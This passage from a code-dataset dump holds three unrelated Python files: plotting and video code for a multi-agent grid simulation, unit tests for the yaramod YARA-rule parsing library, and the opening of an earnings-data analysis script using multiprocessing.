\"\"\"\n if outer_grid is None:\n outer_grid = gridspec.GridSpec(1, 1, wspace=0, hspace=0)[0]\n grid = gridspec.GridSpecFromSubplotSpec(3, 1, subplot_spec=outer_grid,\n wspace=0.1, hspace=0.1, width_ratios=[1],\n height_ratios=[0, 5, 1 if plot_info else 0])\n else:\n grid = gridspec.GridSpecFromSubplotSpec(3, 1, subplot_spec=outer_grid,\n wspace=0.1, hspace=0.1, width_ratios=[1],\n height_ratios=[1 if plot_info else 0, 3, 1 if plot_info else 0])\n ax = plt.Subplot(fig, grid[1])\n\n # Obstacles\n for x, y in self._obstacle_pos:\n self._plot_rect_at_pos(ax, x, y, 'black')\n\n # Add maps of all agents to the plot\n for i_agent in range(self._agent_count):\n if self._view_reduced:\n start_pos = [self._current_pos[0, i_agent]]\n cur_pos = [self._current_pos[time_step, i_agent]]\n aim_pos = [self._aim_pos[time_step, i_agent]]\n else:\n start_pos = np.argwhere(self._current_maps[0, i_agent])\n cur_pos = np.argwhere(self._current_maps[time_step, i_agent])\n aim_pos = np.argwhere(self._aim_maps[time_step, i_agent])\n\n # nxt_map = ... TODO: Next step\n\n color = self._get_plot_color(i_agent, next_step=False)\n # color_next = self._get_plot_color(i_agent, next_step=True) # TODO: Next step\n\n # Plot next position\n # TODO: Next step\n # if self._next_step:\n # self._plot_map(ax, nxt_map, color_next)\n\n # Plot current position\n for x, y in cur_pos:\n self._plot_rect_at_pos(ax, x, y, color)\n\n # Plot path\n if plot_path:\n hist = np.where(self._current_maps[0:time_step + 1, i_agent])\n offset = (1 / (self._agent_count + 1) * (i_agent + 1) * 0.5) - 0.25\n x = hist[2] + 0.5 + offset\n y = self._map_size_x - hist[1] - 0.5 + offset\n ax.plot(x, y, '-', color=color, zorder=0)\n\n # Plot start position\n for x, y in start_pos:\n self._plot_label(ax, x - 0.15, y + 0.2, \"S\", color)\n\n # Plot aim position\n for x, y in aim_pos:\n self._plot_label(ax, x - 0.15, y + 0.2, \"E\", color)\n\n # # Plot agent status # TODO: Agent status\n # if plot_agent_status:\n # for status, symbol in zip(['a', 's', '3', 't'], ['\\u2713', '\\u2717', '\\u2717', '\\u2717']): # \\u2620\n # if self._agents_conditions[i_agent] == status:\n # for x, y in self._current_maps[time_step, i_agent]:\n # self._plot_label(ax, x - 0.15, y + 0.2, symbol, 'black')\n\n # Plot Border\n self._plot_map_border(ax)\n\n ax.set_ylim(0, self._map_size_x)\n ax.set_xlim(0, self._map_size_y)\n ax.set_aspect('equal')\n ax.set_xticks([])\n ax.set_yticks([])\n ax.axis('off')\n ax.set_title(title, fontsize=15)\n fig.add_subplot(ax)\n\n # Add info box below if wanted\n if plot_info:\n ax = plt.Subplot(fig, grid[2])\n self._plot_info(ax, time_step)\n fig.add_subplot(ax)\n\n return fig\n\n def _plot_all(self, fig, time_step=-1, plot_agent_status=True, plot_path=True, plot_input=False,\n plot_info=False, overview_title='Overview'):\n \"\"\"\n Plot a visualisation with a big overview map and\n small maps for all agents for all types of object in the environment\n :param fig: matplotlib figure\n :param time_step: time step to be plotted\n :param plot_agent_status: plot agents status (not implemented yet)\n :param plot_path: plot a line from start via each step to the current position\n :param plot_input: show also heatmaps to visualize network input\n :param plot_info: plot some information below the overview map\n :param overview_title: title of overview map\n :return: matplotlib figure\n \"\"\"\n # Create outer grid\n outer = gridspec.GridSpec(1, 2, wspace=0.1, hspace=0.1, width_ratios=[0.382, 0.618])\n outer.update(left=0.01, right=0.99, top=0.95, bottom=0.01)\n\n # Plot overview (and information box) on the left side\n self._plot_overview(fig, outer[0], time_step=time_step, plot_agent_status=plot_agent_status,\n plot_path=plot_path, plot_info=plot_info, title=overview_title)\n\n # Define titles of the small maps\n if self._next_step:\n nr_maps = 6\n maps_names = ['Obstacles', 'Aim', 'Agent\\'s\\nCurrent Pos.', 'Agent\\'s\\nNext Pos.',\n 'Others\\nCurrent Pos.', 'Others\\nNext Pos.']\n else:\n nr_maps = 4\n maps_names = ['Obstacles', 'Aim', 'Agent\\'s\\nPosition', 'Others\\nPosition']\n if plot_input:\n nr_maps += 2\n maps_names.append('Full Map\\nNet Input')\n maps_names.append('Reduced\\nNet Input')\n\n # Create the right grid for the small maps\n agents_grid = gridspec.GridSpecFromSubplotSpec(self._agent_count, nr_maps, subplot_spec=outer[1],\n wspace=0.1, hspace=0.1)\n\n # Plot small maps\n for i_agent in range(self._agent_count):\n maps = self.get_maps_for_agent(time_step=time_step, agent=i_agent, plot_input=plot_input)\n for i_map, map_ in enumerate(maps):\n i_grid = i_agent * nr_maps + i_map\n ax = plt.Subplot(fig, agents_grid[i_grid])\n if plot_input and i_map + 2 >= nr_maps:\n self._plot_heatmap(ax, map_)\n else:\n color = self._get_plot_color(i_agent)\n if self._view_reduced:\n self._plot_map(ax, map_, color, plot_view_filed=True,\n curr_pos=self._current_pos[time_step, i_agent])\n else:\n self._plot_map(ax, map_, color)\n\n # add map titles\n if ax.is_first_row():\n ax.set_xlabel(maps_names[i_map], fontsize=15)\n ax.xaxis.set_label_position('top')\n\n # add agent titles\n if ax.is_first_col():\n ax.set_ylabel('Agent {}'.format(i_agent), fontsize=15)\n\n fig.add_subplot(ax)\n\n plt.subplots_adjust(wspace=0, hspace=0)\n\n return fig\n\n def plot_map(self, map_, block=True, save_as=None):\n # Its a wrapper method of _plot_map()\n \"\"\"\n Shows a boolean map\n :param map_: number of agent\n :param block: blocking behavior of plt.show(block=...)\n :param save_as: string of path if plot should be saved instead of displayed\n :return:\n \"\"\"\n # Disable tools and create figure and axes\n mpl.rcParams['toolbar'] = 'None'\n fig, ax = plt.subplots(1, figsize=(5, 5))\n\n # Plot map\n self._plot_map(ax, map_, 'black')\n\n # Save of show plot\n if save_as:\n fig.savefig(save_as)\n plt.close(fig)\n else:\n plt.show(block=block)\n\n def plot_overview(self, time_step=-1, plot_agent_status=True, plot_path=True, plot_info=False,\n block=True, save=False):\n # Its a wrapper method of _plot_overview()\n \"\"\"\n Plot a map all agents are included\n :param time_step: time step to be plotted\n :param plot_agent_status: plot agents status (not implemented yet)\n :param plot_path: plot a line from start via each step to the current position\n :param plot_info: plot some information below the map\n :param block: blocking behavior of plt.show(block=...)\n :param save: if true save plot at viz/... instead of displaying\n :return:\n \"\"\"\n if time_step == -1:\n time_step = self.time_steps - 1\n\n # Disable tools and create figure and axes\n mpl.rcParams['toolbar'] = 'None'\n img_width = 1080\n img_height = 1080\n dpi = 120\n fig = plt.figure(figsize=(img_width / dpi, img_height / dpi), dpi=dpi)\n\n # Plot overview\n self._plot_overview(fig, time_step=time_step, plot_agent_status=plot_agent_status, plot_path=plot_path,\n plot_info=plot_info)\n fig.set_size_inches(img_width / dpi, img_height / dpi)\n\n # Save of show plot\n if save:\n directory = os.path.join('viz', self._dt, 'overview')\n\n # Check if directory for images exists\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n file_name = f'{self._dt}_game_{self._i_game}_time_{time_step}_overview.png'\n fig.savefig(os.path.join(directory, file_name), dpi=dpi)\n plt.close(fig) # leads to a crash Python, if this method is executed too often in short time :-(\n else:\n plt.show(block=block)\n\n def plot_all(self, time_step=-1, plot_agent_status=True, plot_path=True, plot_input=False, plot_info=False,\n block=True, save=False):\n # Its a wrapper method of _plot_all()\n \"\"\"\n Plot a visualisation with a big overview map and\n small maps for all agents for all types of object in the environment\n :param time_step: time step to be plotted\n :param plot_agent_status: plot agents status (not implemented yet)\n :param plot_path: plot a line from start via each step to the current position\n :param plot_input: show also heatmaps to visualize network input\n :param plot_info: plot some information below the overview map\n :param block: blocking behavior of plt.show(block=...)\n :param save: if true save plot at viz/... instead of displaying\n :return:\n \"\"\"\n if time_step == -1:\n time_step = self.time_steps - 1\n\n # Disable tools and create figure, axes and outer grid\n mpl.rcParams['toolbar'] = 'None'\n img_width = 1920\n img_height = 1080\n dpi = 120\n fig = plt.figure(figsize=(img_width / dpi, img_height / dpi), dpi=dpi)\n\n # Plot all\n fig = self._plot_all(fig, time_step=time_step, plot_agent_status=plot_agent_status,\n plot_path=plot_path, plot_input=plot_input, plot_info=plot_info)\n fig.set_size_inches(img_width / dpi, img_height / dpi)\n\n # Save of show plot\n if save:\n directory = os.path.join('viz', self._dt, 'all')\n\n # Check if directory for images exists\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n file_name = f'{self._dt}_game_{self._i_game}_time_{time_step}_all.png'\n fig.savefig(os.path.join(directory, file_name), dpi=dpi)\n plt.close(fig) # leads to a crash Python, if this method is executed too often in short time :-(\n else:\n plt.show(block=block)\n\n def generate_mp4(self, kind, plot_agent_status=True, plot_path=True, plot_input=False, plot_info=True):\n \"\"\"\n Generate and save a mp4 video from desired kind of plot over all time steps\n :param kind: kind of plot as string ('all' or 'overview')\n :param plot_agent_status: plot agents status (not implemented yet)\n :param plot_path: plot a line from start via each step to the current position\n :param plot_input: show also heatmaps to visualize network input\n :param plot_info: plot some information below the overview map\n \"\"\"\n plot_func = None\n img_width = 1920\n img_height = 1080\n dpi = 120\n\n # Get right plot function depending of desired kind of plot\n if kind == 'all':\n plot_func = self._plot_all\n elif kind == 'overview':\n plot_func = self._plot_overview\n img_height = 1080\n img_width = 1080 # 900\n\n plt.ioff() # prevent matplotlib from running out of memory\n\n def draw_frame(ts):\n fig = plt.figure(figsize=(img_width / dpi, img_height / dpi), dpi=dpi)\n fig = plot_func(fig, time_step=ts, plot_agent_status=plot_agent_status, plot_path=plot_path,\n plot_input=plot_input, plot_info=plot_info)\n fig.set_size_inches(img_width / dpi, img_height / dpi)\n data = fig_to_data(fig)\n # fig.clf()\n # plt.clf()\n plt.close(fig)\n return data\n\n # # Make the pool of workers # TODO: multithreading\n # pool = mp.ProcessingPool(mp.cpu_count() - 1)\n # # Start multithreading\n # frame_array = list(tqdm(pool.imap(draw_frame, np.arange(self.time_steps)), total=self.time_steps))\n frame_array = [draw_frame(ts) for ts in tqdm(range(self.time_steps))]\n\n # # Close the pool and wait for the work to finish # TODO: multithreading\n # pool.close()\n # pool.join()\n\n directory = os.path.join('viz', self._dt, kind)\n\n # Check if directory for images exists\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n file_name = f'{self._dt}_game_{self._i_game}_{kind}.mp4'\n\n # Generate video\n w = imageio.get_writer(os.path.join(directory, file_name),\n fps=4, quality=6, macro_block_size=20)\n for i in range(len(frame_array)):\n w.append_data(frame_array[i])\n w.close()\n\n # Add entry to a text file including all videos of a run\n # You can use ffmpeg to concatenate videos of a run:\n # ffmpeg -f concat -safe 0 -i mylist.txt -c copy output.mp4\n # https://stackoverflow.com/a/11175851/7439335\n open(os.path.join(directory, 'videos.txt'), \"a\").write(f\"file '{file_name}'\\n\")\n\n def save(self):\n \"\"\"\n Save Visualisation object at viz/...\n :return:\n \"\"\"\n directory = os.path.join('viz', self._dt, 'obj')\n\n # Check if directory for viz exists\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n # Save\n f = open(os.path.join(directory, f'{self._dt}_game_{self._i_game}.viz'), 'wb')\n pickle.dump(self, f, 2)\n f.close()\n\n @staticmethod\n def load(path):\n \"\"\"\n Load Visualisation object from file\n :param path: path of saved Visualisation object\n :return:\n \"\"\"\n f = open(path, 'rb')\n viz = pickle.load(f)\n f.close()\n return viz\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Visualize Environment')\n parser.add_argument(\"-f\", \"--file_path\", type=str,\n help=\"define path to .viz file\")\n args = parser.parse_args()\n\n viz = Visualisation.load(args.file_path)\n viz._color_hue_offset = 0.3\n viz.generate_mp4('all', plot_input=True, plot_info=False)\n","repo_name":"sebastiansze/DL-Project","sub_path":"visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":32988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25163639045","text":"import unittest\nimport yaramod\n\n\nclass RepresentationTests(unittest.TestCase):\n def test_literals(self):\n int_lit = yaramod.Literal(42)\n self.assertTrue(int_lit.is_int)\n self.assertEqual(int_lit.int, 42)\n self.assertEqual(int_lit.uint, 42)\n self.assertEqual(int_lit.text, '42')\n\n hex_int_lit = yaramod.Literal(42, '0x2A')\n self.assertTrue(hex_int_lit.is_int)\n self.assertEqual(hex_int_lit.int, 42)\n self.assertEqual(hex_int_lit.uint, 42)\n self.assertEqual(hex_int_lit.text, '0x2A')\n\n str_lit = yaramod.Literal('hello')\n self.assertTrue(str_lit.is_string)\n self.assertEqual(str_lit.string, 'hello')\n self.assertEqual(str_lit.text, '\"hello\"')\n\n bool_lit = yaramod.Literal(True)\n self.assertTrue(bool_lit.is_bool)\n self.assertEqual(bool_lit.bool, True)\n self.assertEqual(bool_lit.text, 'true')\n\n def test_change_meta_of_rule(self):\n yara_file = yaramod.Yaramod().parse_string('''\nrule empty_rule {\n\tmeta:\n\t\tkey = \"value\"\n\tcondition:\n\t\ttrue\n}''')\n\n self.assertEqual(len(yara_file.rules), 1)\n\n rule = yara_file.rules[0]\n rule.metas[0].value = yaramod.Literal('another value')\n\n expected = '''\nrule empty_rule\n{\n\tmeta:\n\t\tkey = \"another value\"\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_get_string_modifiers(self):\n yara_file = yaramod.Yaramod().parse_string('''\nrule rule_with_string_modifiers {\n\tstrings:\n\t\t$00 = \"value\" ascii wide fullword\n\tcondition:\n\t\tall of them\n}''')\n\n self.assertEqual(len(yara_file.rules), 1)\n self.assertEqual(len(yara_file.rules[0].strings[0].modifiers), 3)\n\n # Order of modifiers is not guaranteed\n string = yara_file.rules[0].strings[0]\n expected_modifiers = {\n yaramod.FullwordStringModifier,\n yaramod.WideStringModifier,\n yaramod.AsciiStringModifier,\n }\n\n for modifier in string.modifiers:\n assert type(modifier) in expected_modifiers\n expected_modifiers.remove(type(modifier))\n\n assert len(expected_modifiers) == 0\n\n def test_remove_string_modifiers(self):\n yara_file = yaramod.Yaramod().parse_string('''\nrule rule_with_string_modifiers {\n\tstrings:\n\t\t$00 = \"value\" ascii wide fullword\n\tcondition:\n\t\tall of them\n}''')\n\n self.assertEqual(len(yara_file.rules), 1)\n self.assertEqual(len(yara_file.rules[0].strings[0].modifiers), 3)\n\n rule = yara_file.rules[0]\n rule.strings[0].remove_modifiers()\n\n expected = '''\nrule rule_with_string_modifiers\n{\n\tstrings:\n\t\t$00 = \"value\"\n\tcondition:\n\t\tall of them\n}\n'''\n self.assertEqual(len(rule.strings[0].modifiers), 0)\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_get_tokenstream(self):\n yara_file = yaramod.Yaramod().parse_string('''\nrule empty_rule {\n meta:\n key = \"value\"\n condition:\n true\n}''')\n\n self.assertEqual(len(yara_file.rules), 1)\n\n rule = yara_file.rules[0]\n rule.metas[0].value = yaramod.Literal('another value')\n\n ts = yara_file.tokenstream\n self.assertFalse(ts.empty)\n self.assertEqual(ts.front.pure_text, '\\n')\n self.assertEqual(ts.back.pure_text, '}')\n self.assertEqual(ts.tokens_as_text, [ '\\n',\n 'rule', 'empty_rule', '{', '\\n',\n 'meta', ':', '\\n',\n 'key', '=', 'another value', '\\n',\n 'condition', ':', '\\n', 'true', '\\n',\n '}'\n ])\n condition_ts = rule.condition.tokenstream\n self.assertEqual(condition_ts.tokens_as_text, [ '\\n',\n 'rule', 'empty_rule', '{', '\\n',\n 'meta', ':', '\\n',\n 'key', '=', 'another value', '\\n',\n 'condition', ':', '\\n', 'true', '\\n',\n '}'\n ])\n\n def test_get_tokenstream_after_syntax_error_1(self):\n input_text = '''\nrule dummy_rule {\n\tcondition\n\t\ttrue\n}'''\n ymod = yaramod.Yaramod()\n try:\n ymod.parse_string(input_text)\n except:\n ts = ymod.yara_file.tokenstream\n self.assertFalse(ts.empty)\n self.assertEqual(ts.front.pure_text, '\\n')\n self.assertEqual(ts.back.pure_text, 'true')\n\n def test_get_tokenstream_after_syntax_error_2(self):\n input_text = '''\nrule dummy_rule {\n\tcondition:\n\t\ttrue ) and false\n}'''\n ymod = yaramod.Yaramod()\n try:\n ymod.parse_string(input_text)\n except:\n ts = ymod.yara_file.tokenstream\n self.assertFalse(ts.empty)\n self.assertEqual(ts.front.pure_text, '\\n')\n self.assertEqual(ts.back.pure_text, ')')\n\n def test_get_tokenstream_after_unknown_identifier_error(self):\n input_text = '''\nrule dummy_rule {\n\tcondition:\n\t\tblah or true\n}'''\n ymod = yaramod.Yaramod()\n try:\n ymod.parse_string(input_text)\n except:\n ts = ymod.yara_file.tokenstream\n self.assertFalse(ts.empty)\n self.assertEqual(ts.front.pure_text, '\\n')\n # After 'blah', also 'or' got into TS, because 'blah' is not tested by the grammar, it is semantics issue\n self.assertEqual(ts.back.pure_text, 'or')\n\n def test_get_tokenstream_after_unknown_module_error(self):\n input_text = '''\nimport \"unknown\"\n\nrule dummy_rule {\n\tcondition:\n\t\ttrue\n}'''\n ymod = yaramod.Yaramod()\n try:\n ymod.parse_string(input_text)\n except:\n ts = ymod.yara_file.tokenstream\n self.assertFalse(ts.empty)\n # After 'unknown', also 'rule' got into TS, because 'unknown' is not tested by the grammar, it is semantics issue\n self.assertEqual(ts.tokens_as_text, [ '\\n',\n 'import', 'unknown', '\\n',\n '\\n',\n 'rule'\n ])\n\n def test_meta_values_interface(self):\n input_text = \"\"\"rule test {\n meta:\n author = \"Name Surname\"\n description = \"Test checking the meta value tokens\"\n condition:\n false\n}\n\"\"\"\n ymod = yaramod.Yaramod()\n yfile = ymod.parse_string(input_text)\n self.assertEqual(len(yfile.rules[0].metas), 2)\n\n meta = yfile.rules[0].metas[0] # author\n self.assertTrue(hasattr(meta, \"token_key\"))\n token = meta.token_key\n self.assertEqual(token.location.begin.line, 3)\n self.assertEqual(token.location.begin.column, 9)\n self.assertEqual(token.location.end.line, 3)\n self.assertEqual(token.location.end.column, 14)\n\n self.assertTrue(hasattr(meta, \"token_value\"))\n token = meta.token_value\n self.assertEqual(token.location.begin.line, 3)\n self.assertEqual(token.location.begin.column, 18)\n self.assertEqual(token.location.end.line, 3)\n self.assertEqual(token.location.end.column, 31)\n\n meta = yfile.rules[0].metas[1] # description\n self.assertTrue(hasattr(meta, \"token_key\"))\n token = meta.token_key\n self.assertEqual(token.location.begin.line, 4)\n self.assertEqual(token.location.begin.column, 9)\n self.assertEqual(token.location.end.line, 4)\n self.assertEqual(token.location.end.column, 19)\n\n self.assertTrue(hasattr(meta, \"token_value\"))\n token = meta.token_value\n self.assertEqual(token.location.begin.line, 4)\n self.assertEqual(token.location.begin.column, 23)\n self.assertEqual(token.location.end.line, 4)\n self.assertEqual(token.location.end.column, 59)\n\n def test_get_modulepool(self):\n ymod = yaramod.Yaramod()\n modules = ymod.modules\n self.assertTrue(\"cuckoo\" in modules)\n self.assertTrue(\"dex\" in modules)\n self.assertTrue(\"dotnet\" in modules)\n self.assertTrue(\"elf\" in modules)\n self.assertTrue(\"hash\" in modules)\n self.assertTrue(\"macho\" in modules)\n self.assertTrue(\"magic\" in modules)\n self.assertTrue(\"math\" in modules)\n self.assertTrue(\"pe\" in modules)\n self.assertTrue(\"time\" in modules)\n\n def test_module_interface(self):\n modules = yaramod.Yaramod().modules\n\n # module cuckoo\n self.assertTrue(\"cuckoo\" in modules)\n cuckoo_symbol = modules[\"cuckoo\"].structure\n self.assertEqual(\"cuckoo\", cuckoo_symbol.name)\n self.assertTrue(cuckoo_symbol.is_structure)\n cuckoo_attributes = cuckoo_symbol.attributes\n\n self.assertTrue(\"network\" in cuckoo_attributes)\n network_symbol = cuckoo_attributes[\"network\"]\n self.assertTrue(network_symbol.is_structure)\n network_attributes = network_symbol.attributes\n\n self.assertTrue(\"http_get\" in network_attributes)\n http_get_symbol = network_attributes[\"http_get\"]\n self.assertTrue(http_get_symbol.is_function)\n self.assertEqual(\"http_get\", http_get_symbol.name)\n self.assertEqual(http_get_symbol.return_type, yaramod.ExpressionType.Int)\n http_get_overloads = http_get_symbol.overloads\n self.assertEqual(len(http_get_overloads), 1)\n self.assertEqual(http_get_overloads[0], [yaramod.ExpressionType.Regexp])\n\n # module pe\n self.assertTrue(\"pe\" in modules)\n pe_symbol = modules[\"pe\"].structure\n self.assertEqual(\"pe\", pe_symbol.name)\n self.assertTrue(pe_symbol.is_structure)\n pe_attributes = pe_symbol.attributes\n\n self.assertTrue(\"MACHINE_UNKNOWN\" in pe_attributes)\n machine_symbol = pe_attributes[\"MACHINE_UNKNOWN\"]\n self.assertTrue(machine_symbol.is_value)\n self.assertEqual(machine_symbol.data_type, yaramod.ExpressionType.Int)\n\n self.assertTrue(\"version_info\" in pe_attributes)\n version_info_symbol = pe_attributes[\"version_info\"]\n self.assertEqual(version_info_symbol.documentation[0:10], \"Dictionary\")\n\n self.assertTrue(\"sections\" in pe_attributes)\n section_array_symbol = pe_attributes['sections']\n self.assertEqual(section_array_symbol.name, 'sections')\n self.assertTrue(section_array_symbol.is_array)\n self.assertEqual(section_array_symbol.element_type, yaramod.ExpressionType.Object)\n self.assertEqual(section_array_symbol.documentation[0:10], 'Individual')\n section_symbol = section_array_symbol.structure\n self.assertEqual(section_symbol.name, 'sections')\n self.assertTrue(section_symbol.is_structure)\n section_attributes = section_symbol.attributes\n\n self.assertTrue(\"characteristics\" in section_attributes)\n\n def test_custom_module_interface(self):\n modules = yaramod.Yaramod(yaramod.Features.AllCurrent, \"./tests/python/testing_modules\").modules\n\n # module module_test\n self.assertTrue(\"module_test\" in modules)\n module_symbol = modules[\"module_test\"].structure\n self.assertEqual(\"module_test\", module_symbol.name)\n self.assertTrue(module_symbol.is_structure)\n cuckoo_attributes = module_symbol.attributes\n\n self.assertTrue(\"structure_test\" in cuckoo_attributes)\n structure_symbol = cuckoo_attributes[\"structure_test\"]\n self.assertTrue(structure_symbol.is_structure)\n structure_attributes = structure_symbol.attributes\n\n self.assertTrue(\"function_test\" in structure_attributes)\n function_symbol = structure_attributes[\"function_test\"]\n self.assertTrue(function_symbol.is_function)\n self.assertEqual(function_symbol.return_type, yaramod.ExpressionType.String)\n function_overloads = function_symbol.overloads\n self.assertEqual(len(function_overloads), 2)\n self.assertEqual(function_overloads[0], [yaramod.ExpressionType.Regexp])\n self.assertEqual(function_overloads[1], [yaramod.ExpressionType.Regexp, yaramod.ExpressionType.String])\n function_documentations = function_symbol.documentations\n print(function_documentations)\n self.assertEqual(len(function_documentations), 2)\n self.assertEqual(function_documentations[0], \"Testing function overload documentation.\")\n self.assertEqual(function_documentations[1], \"Testing function cool overload documentation.\")\n\n self.assertTrue(\"value_test\" in cuckoo_attributes)\n value_symbol = cuckoo_attributes[\"value_test\"]\n self.assertTrue(value_symbol.is_value)\n self.assertEqual(value_symbol.documentation, \"Testing value documentation. Example: ```module_test.value_test > 10```\")\n\n self.assertTrue(\"reference_test\" in cuckoo_attributes)\n reference_symbol = cuckoo_attributes[\"reference_test\"]\n self.assertTrue(reference_symbol.is_reference)\n self.assertEqual(reference_symbol.symbol, structure_symbol)\n\n self.assertTrue(\"references_test\" in cuckoo_attributes)\n references_symbol = cuckoo_attributes[\"references_test\"]\n self.assertTrue(references_symbol.is_array)\n self.assertTrue(references_symbol.structure.is_reference)\n self.assertEqual(references_symbol.structure.symbol, structure_symbol)\n\n def test_custom_module_enhancing_known_module(self):\n modules = yaramod.Yaramod(yaramod.Features.AllCurrent, \"./tests/python/testing_modules\").modules\n\n # module cuckoo\n self.assertTrue(\"cuckoo\" in modules)\n cuckoo_symbol = modules[\"cuckoo\"].structure\n self.assertEqual(\"cuckoo\", cuckoo_symbol.name)\n self.assertTrue(cuckoo_symbol.is_structure)\n cuckoo_attributes = cuckoo_symbol.attributes\n\n # module pe - added of an overload\n self.assertTrue(\"pe\" in modules)\n pe_symbol = modules[\"pe\"].structure\n self.assertEqual(\"pe\", pe_symbol.name)\n pe_attributes = pe_symbol.attributes\n\n # other pe json does not delete functions from base pe json:\n self.assertTrue(\"MACHINE_AM33\" in pe_attributes)\n machine_symbol = pe_attributes[\"MACHINE_AM33\"]\n self.assertTrue(machine_symbol.is_value)\n self.assertEqual(machine_symbol.data_type, yaramod.ExpressionType.Int)\n\n # no problem with multiple definitions of the same symbol if those definitions are compatible:\n self.assertTrue(\"MACHINE_TEST_VALUE\" in pe_attributes)\n machine_symbol = pe_attributes[\"MACHINE_TEST_VALUE\"]\n self.assertTrue(machine_symbol.is_value)\n self.assertEqual(machine_symbol.data_type, yaramod.ExpressionType.Int)\n\n self.assertTrue(\"sections\" in pe_attributes)\n section_array_symbol = pe_attributes['sections']\n self.assertEqual(section_array_symbol.name, 'sections')\n self.assertTrue(section_array_symbol.is_array)\n self.assertEqual(section_array_symbol.element_type, yaramod.ExpressionType.Object)\n self.assertEqual(section_array_symbol.documentation[0:10], 'Individual')\n section_symbol = section_array_symbol.structure\n self.assertEqual(section_symbol.name, 'sections')\n self.assertTrue(section_symbol.is_structure)\n section_attributes = section_symbol.attributes\n\n # pe.sections.characteristics still exists:\n self.assertTrue(\"virtual_address\" in section_attributes)\n # pe.sections.test_sections_value is added:\n self.assertTrue(\"test_sections_value\" in section_attributes)\n test_section_value_symbol = section_attributes['test_sections_value']\n self.assertEqual(test_section_value_symbol.name, 'test_sections_value')\n self.assertTrue(test_section_value_symbol.is_value)\n self.assertTrue(test_section_value_symbol.data_type, yaramod.ExpressionType.String)\n\n self.assertTrue(\"rich_signature\" in pe_attributes)\n rich_signature_symbol = pe_attributes['rich_signature']\n self.assertTrue(rich_signature_symbol.is_structure)\n rich_signature_attributes = rich_signature_symbol.attributes\n\n self.assertTrue(\"test_value\" in rich_signature_attributes)\n self.assertTrue(\"version\" in rich_signature_attributes)\n version_symbol = rich_signature_attributes['version']\n self.assertTrue(version_symbol.is_function)\n version_overloads = version_symbol.overloads\n self.assertEqual(len(version_overloads), 3)\n self.assertEqual(version_overloads[0], [yaramod.ExpressionType.Int])\n self.assertEqual(version_overloads[1], [yaramod.ExpressionType.Int, yaramod.ExpressionType.Int])\n self.assertEqual(version_overloads[2], [yaramod.ExpressionType.Int, yaramod.ExpressionType.String])\n version_overloads_names = version_symbol.argument_names\n self.assertEqual(version_overloads_names[0], [\"version\"])\n self.assertEqual(version_overloads_names[1], [\"version\", \"toolid\"])\n self.assertEqual(version_overloads_names[2], [\"version\", \"test string argument\"])\n\n def test_set_tags_to_empty_list_on_a_rule_without_tags(self):\n yara_file = yaramod.Yaramod().parse_string('''rule empty_rule\n{\n\tcondition:\n\t\ttrue\n}''')\n yara_file.rules[0].tags = []\n\n expected = '''rule empty_rule\n{\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_set_tags_to_empty_list(self):\n yara_file = yaramod.Yaramod().parse_string('''rule empty_rule : test \n{\n\tcondition:\n\t\ttrue\n}''')\n yara_file.rules[0].tags = []\n\n expected = '''rule empty_rule\n{\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_set_tags_on_a_rule_without_tags(self):\n yara_file = yaramod.Yaramod().parse_string('''rule empty_rule\n{\n\tcondition:\n\t\ttrue\n}''')\n yara_file.rules[0].tags = ['foo', 'bar']\n\n expected = '''rule empty_rule : foo bar\n{\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_set_tags_on_a_rule_with_tags(self):\n yara_file = yaramod.Yaramod().parse_string('''rule empty_rule : baz\n{\n\tcondition:\n\t\ttrue\n}''')\n yara_file.rules[0].tags = ['foo', 'bar']\n\n expected = '''rule empty_rule : foo bar\n{\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n","repo_name":"avast/yaramod","sub_path":"tests/python/test_representation.py","file_name":"test_representation.py","file_ext":"py","file_size_in_byte":18106,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"7"} +{"seq_id":"42995686857","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 19 23:31:42 2020\n\n@author: shufe\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 20:51:51 2020\n\n@author: shufe\n\"\"\"\n\nfrom build_model import concat_earning, model_ret, get_before_after_run,get_intra_price\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom multiprocessing import Pool, cpu_count\nimport os\n\n#earning = concat_earning(3)\nearning = pd.read_csv('earning_all.csv',index_col = 0, parse_dates = True)\nind = earning.index.unique()\nearning = earning.loc[ind[:2]]\n\n\ndef add_prop(row):\n print ('starting task %s'%str(os.getpid()))\n ticker = row['symbol']\n date = row.name.date()\n timing = row['timing']\n try:\n p = get_before_after_run(ticker,date,timing)\n #intra = get_intra_price(ticker,date,timing)\n row.set_value('before',p[0])\n row.set_value('after',p[1])\n row.set_value('close',p[2])\n row.set_value('spy_before',p[3])\n row.set_value('spy_after',p[4])\n row.set_value('cons',p[5])\n row.set_value('beta',p[6])\n row.set_value('r2',p[7])\n row.set_value('dev',p[8])\n row.set_value('macd_before',p[9])\n row.set_value('macd_after',p[10])\n #row.set_value('open_2d',p[11])\n return row\n except:\n return\n\ndef generate_input(earning):\n agg_df = []\n p = Pool(15)\n for i, row in earning.iterrows():\n temp = p.apply_async(add_prop,args = (row,))\n agg_df.append(temp)\n p.close()\n p.join()\n agg_df = [x.get() for x in agg_df]\n agg_df = [x for x in agg_df if type(x) != type(None)]\n df = pd.DataFrame(agg_df)\n df = df.sort_index(ascending = False)\n df.to_csv('earning_run_price.csv')\n \nif __name__ == '__main__':\n agg_df = []\n p = Pool(15)\n for i, row in earning.iterrows():\n temp = p.apply_async(add_prop,args = (row,))\n agg_df.append(temp)\n p.close()\n p.join()\n agg_df = [x.get() 